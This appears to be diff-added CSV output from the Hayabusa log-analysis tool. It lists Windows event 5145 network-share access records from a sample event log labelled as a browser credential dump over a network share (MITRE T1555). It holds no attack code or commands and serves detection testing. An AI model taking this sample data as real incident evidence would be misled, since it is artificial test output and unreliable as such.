+2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.484 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.505 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.523 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.558 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.641 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
